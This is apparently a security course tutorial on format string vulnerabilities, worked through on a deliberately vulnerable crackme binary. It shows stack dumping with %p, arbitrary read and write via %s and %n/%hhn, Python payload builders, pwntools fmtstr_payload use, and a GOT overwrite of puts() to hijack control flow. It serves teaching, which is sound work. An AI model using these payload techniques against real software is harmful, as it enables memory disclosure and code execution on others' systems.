==================================
Lec06: Format String Vulnerability
==================================

1. Revisiting an enhanced "crackme0x00"
=======================================

We've eliminated the buffer overflow vulnerability in the crackme0x00
binary. Let's check out the new implementation!

------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

unsigned int secret = 0xdeadbeef;

void handle_failure(char *buf) {
  char msg[100];
  snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
  printf(msg);
}

int main(int argc, char *argv[])
{
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);

  int tmp = secret;

  char buf[100];
  printf("IOLI Crackme Level 0x00\n");
  printf("Password:");

  fgets(buf, sizeof(buf), stdin);

  if (!strcmp(buf, "250382\n")) {
    printf("Password OK :)\n");
  } else {
    handle_failure(buf);
  }

  if (tmp != secret) {
    puts("The secret is modified!\n");
  }

  return 0;
}
------------------------------------------------------------

  $ checksec --file crackme0x00-ssp-exec
  [*] 'tut/lab06/crackme0x00-ssp-exec'
      Arch:     i386-32-little
      RELRO:    Partial RELRO
      Stack:    Canary found
      NX:       NX enabled
      PIE:      No PIE (0x8048000)

As you can see, the stack canary and NX are enabled, but the binary
has only partial RELRO and is not position-independent (no PIE).

NOTE. These two lines are there to make your life easier; they turn
      off buffering for stdout and stdin, so output and input are
      passed through immediately.

  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);

It works as before, but when we type an incorrect password, it
produces an error message like this:

  $ ./crackme0x00-ssp-exec
  IOLI Crackme Level 0x00
  Password:asdf
  Invalid Password! asdf

Unfortunately, this program is using printf() in a very insecure way.

  snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
  printf(msg);

Please note that "msg" might contain your input (e.g., an invalid
password). If it contains a format specifier, which starts with "%",
printf() interprets that specifier as part of its format string,
leading to a security issue.

Let's try typing "%p":

  %p: pointer
  %s: string
  %d: int
  %x: hex

  $ ./crackme0x00-ssp-exec
  IOLI Crackme Level 0x00
  Password:%p
  Invalid Password! 0x64

What's 0x64 as an integer? Can you guess what it represents in the
code?

Let's go crazy by putting in more: "%p" x 15

  $ echo "1=%p|2=%p|3=%p|4=%p|5=%p|6=%p|7=%p|8=%p|9=%p|10=%p|11=%p|12=%p|13=%p|14=%p|15=%p"  | ./crackme0x00-ssp-exec
  Password:Invalid Password! 1=0x64|2=0x80487b0|3=0xff84d918 ...

In fact, this output is a dump of your stack at the printf() call (the
exact addresses vary between runs and builds):

  1=0x64
  2=0x5659705c
  3=0xffdd9af8
  4=0xf7edf580
  ...
  10=0x61766e49
  11=0x2064696c
  12=0x73736150
  13=0x64726f77
  14=0x3d312021
  15=0x327c7025
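
Typing that probe string by hand is error-prone, so here is a small
sketch of generating it. The helper name probe() is made up for this
example; it only builds the input string and does not talk to the
binary.

```python
def probe(n):
    """Return 'k=%p' for k = 1..n, joined by '|', as used above."""
    return "|".join("%d=%%p" % i for i in range(1, n + 1))


if __name__ == "__main__":
    # Pipe this into ./crackme0x00-ssp-exec to dump the first 15 slots.
    print(probe(15))
```

With n = 15 the string is 80 characters long, which still fits into
msg[100] behind the 18-byte "Invalid Password! " prefix.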

Since it's so tedious to keep putting '%p', printf-like functions
provide a convenient way to point to the arguments:

  %[nth]$p
  (e.g., %1$p = first argument)

Let's try:

  $ echo "%10\$p" | ./crackme0x00-ssp-exec
  IOLI Crackme Level 0x00
  Password:Invalid Password! 0x61766e49

NOTE. The backslash in '\$' keeps the shell from interpreting the '$'
      (as it would in, e.g., $PATH).

It matches the 10th stack value listed above.


2. Format String Bug to an Arbitrary Read
=========================================

Let's exploit this format string bug to read an arbitrary value from
an arbitrary memory region.

Have you noticed some interesting values in the stack?

  4=0xf7edf580
  ...
  10=0x61766e49  'Inva'
  11=0x2064696c  'lid '
  12=0x73736150  'Pass'
  13=0x64726f77  'word'
  14=0x3d312021  '! 1='
  15=0x327c7025  '%p|2'
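
If the ASCII annotations look like magic, here is a minimal sketch of
how to recover them: each %p value is a 32-bit word, and x86 stores
its bytes in little-endian order. The list below is copied from the
dump above; nothing else is assumed.

```python
import struct

# Stack slots 10..15 as printed by %p.
words = [0x61766e49, 0x2064696c, 0x73736150,
         0x64726f77, 0x3d312021, 0x327c7025]

# "<I" packs each value as a little-endian unsigned 32-bit integer,
# which restores the byte order the values had in memory.
text = b"".join(struct.pack("<I", w) for w in words)
print(text.decode("ascii"))
```

The result is the beginning of msg itself: the fixed prefix followed
by the first bytes of the input you typed.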
  

It seems we can now refer to what we put onto the stack as if it were
an argument. What's going on?

When you invoke printf(), the arguments passed through the stack are
laid out like this:

  printf("%s", a1, a2 ...)

  [ra]
  [  ] --+
  [a1]   |
  [a2]   |
  [%s] <-+
  [..]

In this simple case, the first bytes of the format string itself
(here, "%s") sit where printf() expects its third argument, so you can
refer to them (as a value) with "%3$s"! It means you can 'read' an
arbitrary memory region like this:

  printf("\xaa\xaa\xaa\xaa%3$s", a1, a2 ...)

  [ra ]
  [   ] --+
  [a1 ]   |
  [a2 ]   |
  [ptr] <-+
  [.. ]

It reads (%s) the string at 0xaaaaaaaa, i.e., every byte up to the
next NUL, and prints it out. In the case of crackme0x00-ssp-exec,
where is your controllable input located on the stack (the _N_ value
below)?

  $ echo "BBAAAA%N\$p" | ./crackme0x00-ssp-exec
  IOLI Crackme Level 0x00
  Password:Invalid Password! BBAAAA0x41414141

What happens when we replace %p with %s? How does it crash?

> How could you read the 'secret' value?

Note that you can locate the address of secret by using 'nm':

  $ nm crackme0x00-ssp-exec | grep secret 
  0804c04c D secret
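
Raw address bytes are awkward to type in a shell, so a read payload is
easier to build in Python. This is only a sketch: read_payload() is a
made-up helper, arg_index stands for the _N_ you worked out above, and
the optional pad plays the role of the "BB" alignment bytes.

```python
import struct


def read_payload(addr, arg_index, pad=b""):
    """pad + little-endian address + '%<arg_index>$s'."""
    return pad + struct.pack("<I", addr) + b"%%%d$s" % arg_index


if __name__ == "__main__":
    # 7 is a placeholder index, not the answer to the exercise.
    print(read_payload(0x0804c04c, 7, pad=b"BB"))
```

Keep in mind that %s keeps printing until it hits a NUL byte, so you
may get more (or fewer) than four bytes back.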


2. Format String Bug to an Arbitrary Write
==========================================

In fact, printf() is very complex, and it supports a 'write': it
writes the total number of bytes printed so far to the location you
specified.

  %n: write number of bytes printed (as an int)

  printf("aaaa%n", &len);

'len' contains 4 = strlen("aaaa") as a result.

Similar to the arbitrary read, you can also write to an arbitrary
memory location like this:

  printf("\xaa\xaa\xaa\xaa%3$n", a1, a2 ...)

  [ra ]
  [   ] --+
  [a1 ]   |
  [a2 ]   |
  [ptr] <-+
  [.. ]

*0xaaaaaaaa = 4 (i.e., \xaa x 4 are printed so far)

Then, how to write an arbitrary value? We need another useful
specifier of printf:

  %[len]d
  (e.g., %10d: print an int padded with spaces to 10 characters)

To write 10 to 0xaaaaaaaa, you can print 6 more characters like this:

  printf("\xaa\xaa\xaa\xaa%6d%3$n", a1, a2 ...)
                          ---
  *0xaaaaaaaa = 0x0000000a
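
One caveat worth checking: the width in %[len]d is a minimum. If the
argument needs more characters than that, printf() prints them all
and your count is off. A small sketch of the arithmetic (the helper
name printed_by_d() is made up):

```python
def printed_by_d(width, arg):
    """Number of characters printf emits for '%<width>d' with int arg."""
    return max(width, len(str(arg)))


# 4 address bytes plus "%6d" of a small number gives the 10 we want.
print(4 + printed_by_d(6, 100))
# A long argument overshoots the requested width.
print(4 + printed_by_d(6, -12345678))
```

This is one reason generated payloads often pad with %[len]c instead:
a char always prints exactly one character before padding.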

By using this, you can write an arbitrary value to the arbitrary
location. For example, you can write a value, 0xc0ffee, to the
location, 0xaaaaaaaa:

1. You can either write four bytes at a time, shifting the address by
   one byte for each write, like this:

  *0xaaaaaaaa = 0x000000ee
  *0xaaaaaaab = 0x000000ff
  *0xaaaaaaac = 0x000000c0

2. Or you can use these smaller size specifiers like below:

  %hn : write the number of printed bytes as a short
  %hhn: write the number of printed bytes as a byte

  printf("\xaa\xaa\xaa\xaa%6d%3$hhn", a1, a2 ...)
                          ---
  *(unsigned char*)0xaaaaaaaa = 0x0a

  so,

  *(unsigned char*)0xaaaaaaaa = 0xee
  *(unsigned char*)0xaaaaaaab = 0xff
  *(unsigned char*)0xaaaaaaac = 0xc0
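
The printed count only ever grows, so writing 0xc0 after 0xff looks
impossible at first. It is not: %hhn stores only the low byte of the
count, so you can let the count wrap around 256. A minimal sketch of
that arithmetic (hhn_paddings() is a made-up helper; 'printed' is the
number of characters already out before the first padding):

```python
def hhn_paddings(value, nbytes, printed):
    """Padding widths to print before each %hhn, lowest byte first."""
    pads = []
    count = printed
    for i in range(nbytes):
        want = (value >> (8 * i)) & 0xff
        pad = (want - count) % 256   # wraps when want < low byte of count
        pads.append(pad)
        count += pad
    return pads


# Three addresses (12 bytes) are printed first, then 0xee, 0xff, 0xc0.
print(hhn_paddings(0xc0ffee, 3, 12))
```

A padding of 0 means the low byte already matches, in which case no
padding specifier is needed before that %hhn.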

> How could you overwrite the 'secret' value with 0xc0ffee?


3. Using pwntools
=================

In fact, it's very tedious to calculate by hand the fmtstr that writes
an arbitrary value to an arbitrary location, even once you understand
the core idea. pwntools provides such a fmtstr exploit generator for
you.

  http://docs.pwntools.com/en/stable/fmtstr.html

  fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

  - offset: the first formatter’s offset you control
  - writes: dict with addr, value {addr: value, addr2: value2}
  - numbwritten: the number of bytes already written by printf()

Let's say we'd like to write 0xc0ffee to *0xaaaaaaaa, and we control
the fmtstr at the 15th param (i.e., %15$p), but 20 characters have
already been printed.

  $ python2 -c "from pwn import*; print(fmtstr_payload(15, {0xaaaaaaaa: 0xc0ffee}, 20))"
  \xaa\xaa\xaa\xaa\xab\xaa\xaa\xaa\xac\xaa\xaa\xaa\xad\xaa\xaa\xaa%202c%15$hhn%17c%16$hhn%193c%17$hhn%64c%18$hhn

Is it similar to what you came up with to write 0xc0ffee to the
'secret' value? Please modify template.py to overwrite the 'secret'
value!
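
One way to compare a generated payload with your own is to replay it
by hand. The sketch below assumes the layout seen in the sample
output (packed 32-bit addresses first, then %Nc / %K$hhn pairs), that
the lowest %K$ index refers to the first address, and that 20
characters were printed before the payload (the count for which the
sample decodes to 0xc0ffee). decode_hhn_payload() is a made-up
helper, not part of pwntools.

```python
import re
import struct


def decode_hhn_payload(payload, printed_before=0):
    """Return {address: byte} that printf() would store via %hhn."""
    first_spec = payload.index(b"%")   # assumes no 0x25 in the addresses
    addr_block = payload[:first_spec]
    addrs = struct.unpack("<%dI" % (len(addr_block) // 4), addr_block)
    count = printed_before + len(addr_block)
    specs = re.findall(rb"(?:%(\d+)c)?%(\d+)\$hhn", payload[first_spec:])
    base = min(int(k) for _, k in specs)
    writes = {}
    for pad, k in specs:
        count += int(pad or 0)         # %Nc prints exactly N characters
        writes[addrs[int(k) - base]] = count & 0xff
    return writes


sample = (b"\xaa\xaa\xaa\xaa\xab\xaa\xaa\xaa\xac\xaa\xaa\xaa\xad\xaa\xaa\xaa"
          b"%202c%15$hhn%17c%16$hhn%193c%17$hhn%64c%18$hhn")
for addr, byte in sorted(decode_hhn_payload(sample, 20).items()):
    print(hex(addr), hex(byte))
```

Read from the lowest address up, the four bytes are ee ff c0 00, which
is 0x00c0ffee in little-endian order.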


4. Arbitrary Execution!
=======================

Your task today is to launch a control-flow hijacking attack by using
this fmtstr vulnerability. The plan is simple: overwrite the GOT entry
of puts() with the address of print_key(), so that when puts() is
invoked, execution is redirected to print_key().

In case you haven't heard of the GOT: the Global Offset Table (GOT)
is a table whose entries hold pointers to external functions (e.g.,
puts() or printf() in libc). When the dynamic loader (ld) initially
loads your program, the GOT is filled with static code pointers that
ultimately invoke _dl_runtime_resolve(). Once the location of the
called function is resolved, its entry is updated with the resolved
pointer (i.e., the real puts() or printf() in libc), so all following
calls go directly to the real function.
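
If the lazy-binding dance feels abstract, a toy model may help. This
is only an analogy in Python: a real GOT holds raw code pointers, and
the class and method names below (ToyProcess, call_plt) are invented
for the example.

```python
class ToyProcess:
    """Toy model of lazy binding through a GOT-like table."""

    def __init__(self):
        self.resolver_calls = 0
        self.libc = {"puts": lambda s: "libc puts: " + s}
        # Before the first call, every GOT slot leads to the resolver.
        self.got = {name: self._lazy_stub(name) for name in self.libc}

    def _lazy_stub(self, name):
        def stub(*args):
            # Stand-in for _dl_runtime_resolve(): look up the real
            # function, patch the GOT slot, then continue into it.
            self.resolver_calls += 1
            self.got[name] = self.libc[name]
            return self.got[name](*args)
        return stub

    def call_plt(self, name, *args):
        # name@plt boils down to: jmp *GOT[name]
        return self.got[name](*args)


proc = ToyProcess()
proc.call_plt("puts", "first")    # resolved lazily, slot gets patched
proc.call_plt("puts", "second")   # goes straight to the "libc" function
# What the exploit does: replace the slot with another target.
proc.got["puts"] = lambda s: "print_key() runs instead"
print(proc.resolver_calls, proc.call_plt("puts", "The secret is modified!"))
```

The caller never changes; whoever controls the table entry controls
where the call lands.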

For example, this is the code snippet for calling puts() in the main():

   0x080488b6 <main+211>:    sub    esp,0xc
   0x080488b9 <main+214>:    push   0x80489ff
   0x080488be <main+219>:    call   0x8048540 <puts@plt>

Note that puts@plt is not the true "puts()" in libc; 0x8048540 is in
your code section (try, vmmap 0x8048540) and the true puts() of libc
is located here:

   > x/10i puts
=> 0xf7630da0 <puts>:	push   ebp
   0xf7630da1 <puts+1>:	push   edi
   0xf7630da2 <puts+2>:	push   esi
   0xf7630da3 <puts+3>:	push   ebx

puts@plt means 'puts' at the Procedure Linkage Table (PLT); it points
to one of the entries in the PLT:

> pdisas 0x8048520
 ► 0x8048520 <err@plt>                    jmp    dword ptr [_GLOBAL_OFFSET_TABLE_+32] <0x804a020>
   0x8048526 <err@plt+6>                  push   0x28
   0x804852b <err@plt+11>                 jmp    0x80484c0

   0x8048530 <fread@plt>                  jmp    dword ptr [_GLOBAL_OFFSET_TABLE_+36] <0x804a024>
   0x8048536 <fread@plt+6>                push   0x30
   0x804853b <fread@plt+11>               jmp    0x80484c0

   0x8048540 <puts@plt>                   jmp    dword ptr [_GLOBAL_OFFSET_TABLE_+40] <0x804a028>
   0x8048546 <puts@plt+6>                 push   0x38
   0x804854b <puts@plt+11>                jmp    0x80484c0

   ...

Let's follow this call (i.e., single stepping into the call),

►  0x8048540 <puts@plt>                   jmp    dword ptr [_GLOBAL_OFFSET_TABLE_+40] <0x804a028>
   0x8048546 <puts@plt+6>                 push   0x38
   0x804854b <puts@plt+11>                jmp    0x80484c0
    ↓
   0x80484c0                              push   dword ptr [_GLOBAL_OFFSET_TABLE_+4] <0x804a004>
   0x80484c6                              jmp    dword ptr [0x804a008] <0xf7fe9240>
    ↓
   0xf7fe9240 <_dl_runtime_resolve>       push   eax
   0xf7fe9241 <_dl_runtime_resolve+1>     push   ecx
   0xf7fe9242 <_dl_runtime_resolve+2>     push   edx

The GOT entry of puts() (i.e., _GLOBAL_OFFSET_TABLE_+40) initially
points to puts@plt+6, the instruction right after the jmp at puts@plt,
and ends up invoking _dl_runtime_resolve() with two parameters, one of
which simply indicates that puts() should be resolved (i.e., 0x38).
Once resolved, _GLOBAL_OFFSET_TABLE_+40 (0x804a028) will point to the
real puts() in libc (0xf7630da0).

So, can you overwrite the GOT entry of puts() and hijack the call
yourself?

In fact, there are two challenges that you will encounter when
writing an exploit.

1) in order to reach puts(), you have to overwrite both the secret
   value and the GOT of puts():

  if (tmp != secret) {
    puts("The secret is modified!\n");
  }

What should be the 'writes' param for fmtstr_payload()?


2) Unfortunately, the size of the buffer is very limited, so it might
not hold a payload for both write targets.

  void handle_failure(char *buf) {
    char msg[100];
    ...
  }

Do you remember the %hn and %hhn tricks that let you write fewer bytes
at a time, like one or two? That's where 'write_size' plays a role:

  fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

  - write_size (str): must be byte, short or int. Tells if you want to
      write byte by byte, short by short or int by int (hhn, hn or n)
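
To get a feel for the trade-off, here is a hand-rolled sketch that
builds an 'addresses first' payload for each write size and measures
it. It is not pwntools' implementation and newer pwntools versions may
lay payloads out differently. Assumptions: 32-bit targets, argument
index 15, 18 characters ("Invalid Password! ") printed before the
payload, no alignment padding, and 0x080486b6 as a made-up stand-in
for the address of print_key(). Since msg[100] keeps 99 characters and
the prefix takes 18, at most 81 bytes of your input survive.

```python
import struct

# write_size -> (bytes per write, length modifier plus 'n')
SIZES = {"byte": (1, b"hhn"), "short": (2, b"hn"), "int": (4, b"n")}


def build_payload(offset, writes, printed=0, write_size="byte"):
    """Sketch of an 'addresses first' fmtstr payload for 32-bit values."""
    step, spec = SIZES[write_size]
    mask = (1 << (8 * step)) - 1
    # Split every 4-byte value into (address, chunk) pairs, low chunk first.
    chunks = [(addr + i, (value >> (8 * i)) & mask)
              for addr, value in writes.items()
              for i in range(0, 4, step)]
    payload = b"".join(struct.pack("<I", addr) for addr, _ in chunks)
    count = printed + len(payload)
    for k, (_, want) in enumerate(chunks):
        pad = (want - count) & mask    # characters still to print
        if pad:
            payload += b"%%%dc" % pad
        payload += b"%%%d$%s" % (offset + k, spec)
        count += pad
    return payload


# Placeholder targets: 'secret' and the puts() GOT slot shown earlier.
writes = {0x0804c04c: 0x00c0ffee, 0x0804a028: 0x080486b6}
sizes = {ws: len(build_payload(15, writes, 18, ws)) for ws in SIZES}
print(sizes)
```

Under these assumptions the byte-wise payload is well over 81 bytes,
while the short-wise one fits. The int-wise payload is the shortest,
but it makes printf() emit over a hundred million padding characters.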

Finally! Can you hijack the puts() invocation to print_key() to get
your flag for this tutorial?